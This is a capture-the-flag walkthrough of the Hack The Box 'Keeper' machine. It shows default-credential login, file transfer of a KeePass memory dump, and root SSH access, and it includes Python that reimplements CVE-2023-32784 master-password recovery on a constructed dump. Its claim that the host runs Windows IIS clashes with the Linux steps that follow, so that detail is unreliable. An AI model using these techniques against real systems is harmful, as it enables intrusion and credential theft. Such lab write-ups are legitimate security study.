Hack the box — Keeper
Scanning IP: 10.1.11.127
Open ports: 22 and 80
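The recon step above in code, as an added example that is not part of the original writeup: a small TCP connect scan plus a banner grab for the SSH port. It runs against a constructed local listener on 127.0.0.1 that answers the way sshd does, not against the Hack The Box host; the ports and banner text are assumptions for the demo.

```python
"""Minimal TCP connect scan and banner grab (added example, not from the writeup).
The target is a constructed local listener, not the Hack The Box machine."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

BANNER = b"SSH-2.0-OpenSSH_9.0p1 constructed-banner\r\n"  # assumed, not the box's real banner


def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Full TCP handshake; a refused or timed-out connect counts as closed/filtered."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def connect_scan(host: str, ports, timeout: float = 0.5, workers: int = 64) -> list:
    """Scan the given ports concurrently and return the open ones, sorted."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, port_open(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def grab_banner(host: str, port: int, timeout: float = 2.0) -> str:
    """SSH servers send their identification string first (RFC 4253),
    so a bare connect is enough to learn the server software and version."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(256).decode("ascii", "replace").strip()
    except OSError:
        return ""


def demo() -> tuple:
    """Constructed target: one listener greeting like sshd and one port known to be closed.
    Returns (scan found exactly the open port, banner text)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    srv.settimeout(0.2)
    open_port = srv.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()  # nothing listens here any more

    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(BANNER)
                except OSError:  # scanner closed before we could greet it
                    pass

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    found = connect_scan("127.0.0.1", [closed_port, open_port])
    banner = grab_banner("127.0.0.1", open_port)
    stop.set()
    t.join()
    srv.close()
    return found == [open_port], banner


if __name__ == "__main__":
    print(demo())
```

A connect scan completes the handshake, so it is logged by the target like any other client; nmap's default SYN scan is quieter but needs raw-socket privileges.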
Visiting port 80 in a web browser. A Windows Server IIS is exposed and not properly configured.
Windows Server with Internet Information Services (IIS) is a common combination for hosting and managing web applications and websites on Windows-based servers. IIS is Microsoft's web server: it delivers web content, hosts web applications and manages internet services. An overview of Windows Server IIS:
- Installation: IIS is a server role that is added through Server Manager (or the equivalent PowerShell cmdlets) on a Windows Server operating system.
- Web Hosting: IIS is primarily used for hosting websites and web applications. It supports HTML, CSS, JavaScript, ASP.NET, PHP and more.
- Scalability: IIS handles a wide range of web traffic and supports load balancing, clustering and other features for high availability and performance.
- Security: IIS provides authentication, authorization, SSL/TLS support and request filtering to protect web applications and data. Typical misconfigurations to look for are directory listing left enabled, verbose error pages, leftover default or sample content, and application pools running as over-privileged accounts.
- Application Pools: IIS uses application pools to isolate web applications from each other, each running under its own identity. That contains the damage if one application is compromised and keeps a crashing application from taking down the rest.
- Centralized Management: IIS can be managed across multiple servers; IIS Manager provides a graphical interface for configuration and management.
- FTP Server: IIS includes an FTP server. Plain FTP sends credentials in the clear, so if it must be exposed, require FTP over TLS (FTPS).
- Server-side Scripting: ASP.NET, classic ASP, PHP and other server-side languages are supported for building dynamic web applications.
- Integration: IIS integrates with other Microsoft technologies such as SQL Server, Active Directory and SharePoint, which suits enterprise environments.
- Logging and Monitoring: IIS writes per-request logs (W3C extended format by default) that can be fed to monitoring tools for performance analysis or to a SIEM for detection.
- Customization: IIS settings such as authentication methods and URL rewriting can be tailored to each application's requirements.
- Web Services: IIS can host SOAP-based web services and RESTful APIs.
- Content Caching: output caching (user-mode and kernel-mode) improves the speed and responsiveness of sites and applications.
- Additional Security Features: IP and domain restrictions, URL authorization and dynamic IP restrictions can further tighten access.
- Web Deploy: Microsoft's Web Deploy tool simplifies deploying web applications to IIS servers.
Windows Server IIS is a robust and versatile web server platform for anything from small websites to large enterprise solutions, provided it is configured and patched with the same care as any other internet-facing service.
Added the IP and hostname to /etc/hosts.
The site is Best Practical's ticketing system (Request Tracker). Googling its default credentials gives the username 'root' and password 'password'.
Trying to understand the ins and outs of the ticketing system.
Managed to see the users root and lnorggard with their data.
The open ports seen earlier were 22 and 80. Logging in over SSH from the CLI with the credentials found in the ticketing system was successful.
SSH is a network protocol used to securely access and manage remote servers and devices over an untrusted network such as the internet. It provides an authenticated, encrypted channel for logging in to and controlling remote systems, and is widely used in system administration, remote server management and secure file transfer.
Authentication: SSH authenticates both sides. The client verifies the server by its host key (the fingerprint prompt on first connection, remembered in known_hosts afterwards), and the server authenticates the user with a password or, more securely, with a public key.
Encryption: All data exchanged between client and server during an SSH session is encrypted and integrity-protected, so an attacker on the path can neither read nor tamper with it.
Port: By default SSH listens on port 22, but it can be configured to use a different port. Moving the port cuts down on noise from automated scanners, but it is not a security control in itself: any port scan finds it.
SSH Keys: Public-key authentication is the preferred method. The user generates a key pair; the public key is placed on the remote server (in ~/.ssh/authorized_keys) and the private key stays on the user's machine. At login the client proves possession of the private key by signing a challenge from the server; the private key itself never leaves the client.
To generate an SSH key pair, use the ssh-keygen command on your local machine (ed25519 is the usual key type today).
SSH Clients and Servers: SSH requires both a client and a server. The SSH client is the software used to initiate a secure connection to a remote server, while the SSH server runs on the remote system and listens for incoming connections. Common SSH clients include OpenSSH, PuTTY (for Windows), and various GUI-based clients. Most Unix-based systems come with OpenSSH pre-installed.
Tunneling: SSH can also create secure tunnels (local, remote or dynamic port forwarding) to reach services on or behind a remote server, such as databases or internal web applications. This is known as SSH tunneling or port forwarding.
user.txt 🤤
Interesting files I saw: KeePassDumpFull.dmp and passcodes.kdbx
Transfer from the Hack The Box machine to my machine:
hackthebox: python3 -m http.server
my machine: wget http://IP:Port/File
The python3 -m http.server command starts a simple HTTP server using Python 3. Run in a directory, it serves every file and subdirectory under that location over HTTP, which makes it handy for quickly moving files off a box or testing web pages locally.
python3 -m http.server
With no arguments it listens on port 8000 and prints the address it is serving on; you can reach it at http://localhost:8000 or http://127.0.0.1:8000 in a browser, or fetch a single file with wget or curl from another host. Two things to keep in mind: it binds to all interfaces by default, so everything in that directory is readable by anyone who can reach the box until you stop it (the -b/--bind option restricts the listening address and -d/--directory the directory served), and it is plain HTTP, so verify the transferred file with a hash (sha256sum on both ends) rather than trusting the byte count.
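The same transfer in code, as an added example that is not from the writeup: it starts the equivalent of python3 -m http.server on a temporary loot directory bound to 127.0.0.1, pulls a constructed placeholder for KeePassDumpFull.dmp back over HTTP and checks its SHA-256, which is the check worth doing on the real transfer as well. The file name and contents are constructed for the demo.

```python
"""Serve a loot directory the way `python3 -m http.server` does, fetch a file
back and verify its hash.  Added example (not from the writeup); the file is a
constructed placeholder, and everything stays on 127.0.0.1 so it runs offline."""
import hashlib
import os
import tempfile
import threading
import urllib.request
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-in for the dump; not a real KeePass process dump.
SAMPLE_CONTENT = b"KeePassDumpFull.dmp placeholder (constructed, not a real dump)\n" * 64


class QuietHandler(SimpleHTTPRequestHandler):
    """Same behaviour as the stock handler, minus the per-request log line."""

    def log_message(self, format, *args):
        pass


def serve_directory(directory: str, bind: str = "127.0.0.1", port: int = 0) -> ThreadingHTTPServer:
    """Equivalent of `python3 -m http.server -b <bind> -d <directory> <port>`.
    Binding explicitly matters: the module's default is 0.0.0.0, i.e. the whole
    directory becomes readable by anyone who can reach the host."""
    httpd = ThreadingHTTPServer((bind, port), partial(QuietHandler, directory=directory))
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def fetch(url: str, timeout: float = 10.0) -> bytes:
    """The `wget http://IP:PORT/FILE` side of the transfer."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def demo_transfer() -> tuple:
    """Stage the file, serve it, fetch it, compare hashes.
    Returns (hashes match, bytes received)."""
    with tempfile.TemporaryDirectory() as loot:
        path = os.path.join(loot, "KeePassDumpFull.dmp")
        with open(path, "wb") as f:
            f.write(SAMPLE_CONTENT)
        # On the real box this is `sha256sum KeePassDumpFull.dmp` before pulling.
        expected = sha256_hex(SAMPLE_CONTENT)

        httpd = serve_directory(loot)
        host, port = httpd.server_address[:2]
        try:
            received = fetch(f"http://{host}:{port}/KeePassDumpFull.dmp")
        finally:
            httpd.shutdown()      # stop serving as soon as the file is across
            httpd.server_close()
    return sha256_hex(received) == expected, received


if __name__ == "__main__":
    ok, data = demo_transfer()
    print(ok, len(data))
```

Stop the server as soon as the file is across; a forgotten http.server on a shared lab box hands your loot to everyone else on the network.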
KeePass is an open-source password manager that allows you to securely store and manage your passwords and other sensitive information. Here are some key features and information about KeePass:
Password Storage: KeePass provides a secure repository for storing your passwords. You can organize your passwords into categories, and it offers a powerful search feature for quickly finding specific credentials.
Strong Encryption: KeePass encrypts the database with AES-256 by default (KeePass 2.x also offers ChaCha20) and derives the key from the master password with a deliberately slow key derivation function (AES-KDF or Argon2), so brute-forcing the master password is expensive.
Master Password: To access your password database, you need to create and remember a master password. This is the only password you’ll need to remember, as KeePass takes care of the rest.
Auto-Type: KeePass can automatically fill in login forms for websites and applications, making it convenient to use complex and unique passwords for each account.
Password Generation: The software has a built-in password generator that can create strong and random passwords according to your specifications.
Plugin Support: KeePass supports plugins that can extend its functionality. There are various plugins available that add features like browser integration, synchronization with cloud storage services, and more.
Cross-Platform: While KeePass is primarily a Windows application, there are ports and compatible versions available for other platforms, including macOS, Linux, Android, and iOS. This allows you to access your passwords across different devices.
Offline: KeePass is an offline password manager, which means your password database is stored locally on your device. It doesn’t rely on cloud storage for security, which can be a pro or con depending on your preferences and needs.
Open Source: Being open-source means that the software’s source code is publicly available for inspection, which can provide a higher level of trust in its security.
File Format: KeePass uses the “.kdbx” file format for password databases. You can create, open, and save “.kdbx” files, which can be used with compatible applications on different platforms.
KeePass Master Password Dumper is a simple proof-of-concept tool that recovers the master password from KeePass's process memory, apart from the first character. The leak (CVE-2023-32784, fixed in KeePass 2.54) comes from the masked password text box: each keystroke leaves a copy of the partially typed password in memory, so a memory dump of the running process contains every character except the first.
Moved KeePassDumpFull.dmp into the directory of the keepass password dumper.
The keepass password dumper has good documentation on how to use it properly.
I tried to run the program and got an error. To fix it, I had to change the program's .NET target from 7 to 6.
Ran the application and it completed successfully.
The password candidates:
dgrod med flode
DGROD MED FLODE
(Danish, translated:) Rødgrød med fløde is a lovely Danish summer classic that both evokes memories of summers past and gives us good reason to appreciate Danish berries. Rødgrød med fløde can be made with any red or blue berries: strawberries, redcurrants, raspberries, blackcurrants, blackberries, and even gooseberries and blueberries. Homemade rødgrød just needs to be made with love and served with cream, and there will surely be joy around the summer table.
TL;DR: the kdbx master password is "rødgrød med fløde". The dumper cannot recover the first character, and the ø characters do not appear in the candidates as written above, but the remaining "dgrod med flode" is enough to search for and complete the Danish dessert name.
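To make the technique concrete, the search the dumper performs is reimplemented below in Python as an added example (this is not the dumper's own code, and the memory dump it scans is a constructed byte string, not KeePassDumpFull.dmp). It assumes the leak as described above: every keystroke into the masked password box leaves a UTF-16LE string of k-1 bullet characters (U+25CF) followed by the k-th character, so grouping the characters seen after exactly n bullets by n yields position n of the password, and position 0 is never recoverable. Run on a fake dump built from the real password it returns ●ødgrød med fløde.

```python
"""Leftover-string search behind the KeePass master password dumper, reimplemented
as an added example (not the tool's code).  The dump scanned here is constructed."""
from __future__ import annotations

from collections import Counter, defaultdict

BULLET = "\u25cf".encode("utf-16-le")  # b'\xcf\x25': the dot drawn in place of each typed character


def leftover_strings(password: str) -> list[bytes]:
    """Assumed model of the leak: after k keystrokes, k-1 bullets + the k-th
    character linger in memory.  Nothing is left behind for the first character."""
    return [BULLET * (k - 1) + password[k - 1].encode("utf-16-le")
            for k in range(2, len(password) + 1)]


def build_fake_dump(password: str, copies: int = 3) -> bytes:
    """Constructed stand-in for a process dump: leftovers scattered between junk,
    each present several times (stale heap copies), plus a decoy run of bullets
    followed by a non-printable character that a naive search would misreport."""
    junk = b"\x00\x00ABCD\x00\x00"
    parts = [junk]
    for s in leftover_strings(password):
        parts.extend([s, junk] * copies)
    parts.append(BULLET * 4 + b"\x01\x00" + junk)  # decoy: must be ignored
    return b"".join(parts)


def scan_dump(dump: bytes) -> dict[int, Counter]:
    """Map password position (index into the string; 0 is never leaked) to a
    Counter of the characters seen right after exactly that many bullets."""
    hits: dict[int, Counter] = defaultdict(Counter)
    i = dump.find(BULLET)
    while i != -1:
        n = 0
        while dump[i + 2 * n: i + 2 * n + 2] == BULLET:
            n += 1
        tail = dump[i + 2 * n: i + 2 * n + 2]
        if len(tail) == 2:
            try:
                ch = tail.decode("utf-16-le")
            except UnicodeDecodeError:  # lone surrogate, not a character
                ch = ""
            if ch and ch.isprintable():
                hits[n][ch] += 1
        i = dump.find(BULLET, i + 2 * n + 2)  # continue after this run and its tail
    return dict(hits)


def reconstruct(hits: dict[int, Counter], unknown: str = "\u25cf") -> str:
    """Best guess per position; the first character is reported as a bullet,
    and a position with no evidence at all as '?'."""
    if not hits:
        return ""
    guess = [unknown]
    for pos in range(1, max(hits) + 1):
        guess.append(hits[pos].most_common(1)[0][0] if pos in hits else "?")
    return "".join(guess)


if __name__ == "__main__":
    dump = build_fake_dump("rødgrød med fløde")
    print(reconstruct(scan_dump(dump)))  # ●ødgrød med fløde
```

The per-position Counter is what the real tool prints as alternatives: in a genuine dump some positions also carry stale characters from earlier typing or corrections, which is why it reports candidates rather than a single string, and why the first character still has to be guessed or brute-forced against the database.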
Downloaded KeePass to open passcodes.kdbx.
Created the PPK file. A PPK (PuTTY Private Key) file stores a private key for SSH (Secure Shell) authentication. PuTTY is a popular SSH client for Windows, and it keeps the private keys used to authenticate to remote servers in PPK files. Key points about PPK files:
Private Key: SSH public-key authentication uses a key pair. The private key is kept secret and never shared; the public key is placed on the remote server. At login the server checks that the offered public key is authorized and then challenges the client to prove it holds the matching private key, so the private key never leaves your machine.
PPK Format: PuTTY uses its own documented PPK format, saved with a ".ppk" extension. Current PuTTY versions write PPK version 3 (which protects passphrase-encrypted keys with Argon2); older tools may only understand version 2.
Creating PPK Files: To create a PPK file, you typically start with a private key in another format, such as OpenSSH's (usually a file called "id_rsa", "id_ed25519" or the obsolete "id_dsa"), and use PuTTY's PuTTYgen tool to convert it into PPK format.
PuTTYgen: PuTTYgen is a separate program included with PuTTY that allows you to generate, import, and export SSH key pairs in various formats, including PPK. You can load an existing private key and save it as a PPK file using PuTTYgen.
Using PPK Files: Once you have a PPK file, you can configure PuTTY to use it for SSH authentication. When you connect to a remote server using PuTTY, you specify the PPK file in the PuTTY configuration settings, and PuTTY will use it for authentication.
Compatibility: PPK files are specific to PuTTY and are not understood by OpenSSH or most other SSH clients. To use the same private key with OpenSSH on Linux, convert the PPK file into OpenSSH's format first.
Puttygen — PuTTYgen is a key pair generator tool that is included with the PuTTY suite of software. It is specifically used for generating, managing, and converting SSH key pairs for use with PuTTY and related SSH clients. Here’s how you can use PuTTYgen:
Generating SSH Key Pairs:
Open PuTTYgen.
-Choose the key type (Ed25519 is the best choice today; RSA if the server requires it; DSA is obsolete and rejected by current OpenSSH).
-For RSA, choose the key size (2048 bits is the minimum you should use; 3072 or 4096 is better; Ed25519 keys have a fixed size).
-Click the “Generate” button.
-Follow the on-screen instructions to generate randomness for the key. This often involves moving your mouse within the PuTTYgen window.
-Once the key is generated, you will see the public key and key fingerprint displayed on the screen.
-You can optionally set a passphrase to add an extra layer of security to your private key.
-Click “Save private key” to save the private key in PPK format, which is used by PuTTY. You should protect this private key file carefully.
-Click “Save public key” to save the public key in a format that can be shared with remote servers for authentication. This is the key you typically add to the ~/.ssh/authorized_keys file on the server.
Loading Existing Keys:
You can load existing private keys (in PPK or other formats) into PuTTYgen by clicking “Load.”
Converting Keys:
PuTTYgen can also convert between key formats: load a PPK and use Conversions > Export OpenSSH key to get a private key file OpenSSH accepts, or load an OpenSSH key and save it as PPK. On Linux the puttygen command-line tool does the same conversion with its -O private-openssh output option, which is the step needed here before the key can be used with ssh -i.
Viewing Key Information:
You can view detailed information about a loaded key, such as its fingerprint, type, and comment.
Key Comment:
You can add a comment to your key pair. This is a useful way to label your keys for identification purposes.
Public Key Copying:
You can copy the public key’s text to your clipboard to easily paste it into the ~/.ssh/authorized_keys file on a remote server.
Restrict the permissions on the converted private key with this command: chmod 400 filename
The chmod 400 command on Unix-like systems sets a file's permissions to read-only for the owner and no access for group members and others. The numeric notation "400" means:
- The first digit (4) is the owner's permission: read (4).
- The second and third digits (00) are the group's and others' permissions: none (0).
So with mode 400 only the owner of the file can read it, and neither group members nor other users have any access. This is not optional for SSH: the client refuses to use a private key that is readable by group or others (it prints "WARNING: UNPROTECTED PRIVATE KEY FILE!" and "Permissions ... are too open", ignores the key, and falls back to password authentication).
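To show why the chmod matters, the permission check OpenSSH performs is reimplemented in Python below as an added example (it is not OpenSSH's code and not from the writeup). It writes a constructed placeholder key to a temporary directory, shows that the typical mode 644 fails the check, applies the equivalent of chmod 400 and re-checks.

```python
"""OpenSSH ignores a private key whose group or other permission bits are set.
Added example: the check is reimplemented here (not OpenSSH's own code), and
the key file is a constructed placeholder, not real key material."""
import os
import stat
import tempfile

PLACEHOLDER_KEY = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "constructed placeholder, not key material\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)


def private_key_perms_ok(path: str) -> bool:
    """True only if no group/other bits are set (mode & 077 == 0), which is the
    condition ssh applies before it will use an identity file."""
    return (os.stat(path).st_mode & 0o077) == 0


def lock_down_private_key(path: str) -> int:
    """Equivalent of `chmod 400 path`; returns the resulting permission bits."""
    os.chmod(path, stat.S_IRUSR)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo() -> tuple:
    """Returns (check result at mode 644, check result after chmod 400, final mode bits)."""
    with tempfile.TemporaryDirectory() as d:
        key = os.path.join(d, "id_rsa")
        with open(key, "w") as f:
            f.write(PLACEHOLDER_KEY)
        os.chmod(key, 0o644)  # typical mode after wget/copy-paste: world-readable
        before = private_key_perms_ok(key)
        bits = lock_down_private_key(key)
        after = private_key_perms_ok(key)
        return before, after, bits


if __name__ == "__main__":
    print(demo())  # (False, True, 256)
```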
ssh -i id_rsa root@keeper.htb
You finally found the flag 😈